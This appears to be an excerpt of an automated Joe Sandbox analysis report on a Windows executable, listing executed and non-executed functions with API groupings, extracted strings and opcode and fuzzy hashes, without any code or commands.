                                                              • Opcode ID: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction ID: 5c5c97092251ccb6e51d21bc2c296289ab600fd53c4e4fe069e69402a2a58e68
                                                              • Opcode Fuzzy Hash: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction Fuzzy Hash: F7213B32601B5086EA1ADB53BC41799A6A8FBC8FD0F498025AF584BB66DE38C852C340
                                                              Function 00000001400126D0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapValue
                                                              • String ID:
                                                              • API String ID: 2362848668-0
                                                              • Opcode ID: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                              • Instruction ID: d5031950f6f24f379c2142eebe898701a91e7a03f91a2b9bee16bac6c279ab43
                                                              • Opcode Fuzzy Hash: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                              • Instruction Fuzzy Hash: 2D219676609B44C6CB20CF5AE49025AB7A0F7CCBA8F144216EB8D43B78DF79C651CB40
                                                              Function 000000014000DD30 Relevance: 2.5, APIs: 2, Instructions: 33memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CloseFreeHandleHeap
                                                              • String ID:
                                                              • API String ID: 1642312469-0
                                                              • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                              • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
                                                              • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                              • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
                                                              Function 000000014000DDC0 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                              • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
                                                              • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                              • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
                                                              Function 0000000140010FFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Free
                                                              • String ID:
                                                              • API String ID: 3978063606-0
                                                              • Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                              • Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
                                                              • Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                              • Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
                                                              Function 000000014000DC88 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                              • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
                                                              • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                              • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
                                                              Function 000000014000C980 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CreateHeap
                                                              • String ID:
                                                              • API String ID: 10892065-0
                                                              • Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                              • Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
                                                              • Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                              • Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00
                                                              Function 000000014000C6B0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionHandlerRemoveVectored
                                                              • String ID:
                                                              • API String ID: 1340492425-0
                                                              • Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                              • Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
                                                              • Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                              • Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780

                                                              Non-executed Functions

                                                              Function 000000014000B758 Relevance: 72.0, APIs: 35, Strings: 6, Instructions: 272windowmemoryregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                                              • String ID: BUTTON$C$EDIT$P$STATIC$n
                                                              • API String ID: 9748049-1690119102
                                                              • Opcode ID: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                              • Instruction ID: f11a45e4f50ece19de517c67b98e9e797584e7b20c87343cc1d5b6865565d8d0
                                                              • Opcode Fuzzy Hash: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                              • Instruction Fuzzy Hash: 4DD134B5605B4086EB12DF62F8447AA77A5FB8CBC8F444129EB4A47B79DF7DC4098B00
                                                              Function 0000000140013798 Relevance: 12.0, Strings: 9, Instructions: 740COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                              • API String ID: 0-2665694366
                                                              • Opcode ID: 67ed6bfcabc3f0c0ebd438a55ac1e776d09ba86ed25bc9a2d2f07d297f59d07e
                                                              • Instruction ID: 94762fe19e52a1e76ee8dc23a2b1d827446cec64643fb03410c83a9544901dbd
                                                              • Opcode Fuzzy Hash: 67ed6bfcabc3f0c0ebd438a55ac1e776d09ba86ed25bc9a2d2f07d297f59d07e
                                                              • Instruction Fuzzy Hash: 9452D2726106608BE72ACF26D49CBED37E5F3487C4F414129EB868B7A4E77AC845CB50
                                                              Function 0000000140013021 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 381COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                              • API String ID: 0-4074041902
                                                              • Opcode ID: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                              • Instruction ID: dac418b812a3de41c7c7b5072b67fa498c356b49e4a588b682982c80ed946ec6
                                                              • Opcode Fuzzy Hash: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                              • Instruction Fuzzy Hash: 4DF19C726007508BEB268F1AC48CBAE3BE6F7487C8F064519EF8A4B7A4DB76C555C740
                                                              Function 0000000140015F30 Relevance: 4.1, Strings: 3, Instructions: 374COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
                                                              • API String ID: 0-3255898291
                                                              • Opcode ID: 1e45c625052aaed0026cb6e9d9d155a9553cb1c11e4068b20b0b3ed65267e05e
                                                              • Instruction ID: 36a5a67a6b198623208e03fcdf44eed6b32d9d42851390dc4c2f02830f1e2460
                                                              • Opcode Fuzzy Hash: 1e45c625052aaed0026cb6e9d9d155a9553cb1c11e4068b20b0b3ed65267e05e
                                                              • Instruction Fuzzy Hash: 17D11733618AD08BD71A8F7AD8443AD7BA1F3597C1F048116FB968B7D1DA3ACA49C700
                                                              Function 0000000140012E97 Relevance: 4.0, Strings: 3, Instructions: 212COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: incorrect header check$invalid window size$unknown compression method
                                                              • API String ID: 0-1186847913
                                                              • Opcode ID: 52ed7635aeae8ff526247262ac50360336e7a020413c2717a67c94432d795328
                                                              • Instruction ID: 2adac2097dd96be31fc3b588942c2867655d7ffa7f23b7c0480b06af30ac11af
                                                              • Opcode Fuzzy Hash: 52ed7635aeae8ff526247262ac50360336e7a020413c2717a67c94432d795328
                                                              • Instruction Fuzzy Hash: 35917F726042008BFB6ACF26D58879D3BE5F3083D4F154129EB598BBB0D73AD9A1CB40
                                                              Function 0000000140013507 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $invalid block type
                                                              • API String ID: 0-2056396358
                                                              • Opcode ID: 6a1db03687435ebb1430cf625d2d53183cb1bdca78445c29a8775c11b27300e0
                                                              • Instruction ID: a7252faa3c80580baed472012d71d0b62e6cbeab3839f0b874d886ed0dadd07f
                                                              • Opcode Fuzzy Hash: 6a1db03687435ebb1430cf625d2d53183cb1bdca78445c29a8775c11b27300e0
                                                              • Instruction Fuzzy Hash: 6F6190B3610B508BE726CF26D9883AD37A0F3193D4F554125EB568BBE0D77AD590CB40
                                                              Function 000000014000EA48 Relevance: 2.8, APIs: 1, Instructions: 1540COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memmove
                                                              • String ID:
                                                              • API String ID: 2162964266-0
                                                              • Opcode ID: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
                                                              • Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
                                                              • Opcode Fuzzy Hash: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
                                                              • Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44
                                                              Function 0000000140010210 Relevance: .7, Instructions: 676COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
                                                              • Instruction ID: 022ba38ea2fc746ee1b0595bfd7f682d53a7df84c20089d95d53e5e85305b389
                                                              • Opcode Fuzzy Hash: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
                                                              • Instruction Fuzzy Hash: E32283B7F744204BD71DCB69EC52FE836A2B75434C709A02CAA17D3F44EA3DEA158A44
                                                              Function 0000000140014E90 Relevance: .2, Instructions: 216COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf726ec6ae42089ceab56936488a5fdcc83c03c51bcf0dd9a340e541980c14d4
                                                              • Instruction ID: 127c8a3eefbec1cf179e73712b468f180dd3e669bf73dd13b43b77d2e925ff5f
                                                              • Opcode Fuzzy Hash: cf726ec6ae42089ceab56936488a5fdcc83c03c51bcf0dd9a340e541980c14d4
                                                              • Instruction Fuzzy Hash: F8818E733301749BE7668A2EA514BE93690F3693CEFC16114FB8487B85CA3DB921CB40
                                                              Function 0000000140014E80 Relevance: .2, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c5c31c79345c80cbc84505c9318a96aa45c2c473e25a63ddceb6769520a1643
                                                              • Instruction ID: 09e49e300f3b48ce8064fe567ba8ae1e18cb52cb4f612ff9abff1437f032a71a
                                                              • Opcode Fuzzy Hash: 5c5c31c79345c80cbc84505c9318a96aa45c2c473e25a63ddceb6769520a1643
                                                              • Instruction Fuzzy Hash: D5712BB33301749BEB658B1E9514BA93390F36A389FC16105FB855BB85CA3EB921CB50
                                                              Function 0000000140015220 Relevance: .1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
                                                              • Instruction ID: 87c4626dc5aae324383e141a43b2e00566bb5f4a4c096efdb9aa1e36bd959186
                                                              • Opcode Fuzzy Hash: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
                                                              • Instruction Fuzzy Hash: CB41843721064087FBAA9B1AA010BEE7790E79A7C5F949115DB829FAE0CA7BD5058B00
                                                              Function 000000014000BC94 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 115libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                              • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                              • API String ID: 217932011-4219398408
                                                              • Opcode ID: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                              • Instruction ID: 4189c401249be1c18680961fdd5f00b64fd9ff4c66db3fab09ee0cba437a9a89
                                                              • Opcode Fuzzy Hash: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                              • Instruction Fuzzy Hash: 6C418F72211B4086EB16EF12F8447EA73A4F78CBC8F544125EB49477A5DF39C55AC700
                                                              Function 000000014000DB18 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 107libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                              • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                              • API String ID: 1740785346-287042676
                                                              • Opcode ID: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                              • Instruction ID: 39544a34e48b1591535f5ec23c8084432afafb0fbbbedabb5ee694640fe7ccea
                                                              • Opcode Fuzzy Hash: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                              • Instruction Fuzzy Hash: A94184B1214A46C2FA26EB57B4A4BF97291AB8C7D0F540127BB0A0B7F5DEB9C841C610
                                                              Function 0000000140016CC4 Relevance: 19.6, APIs: 13, Instructions: 81memoryregistrythreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
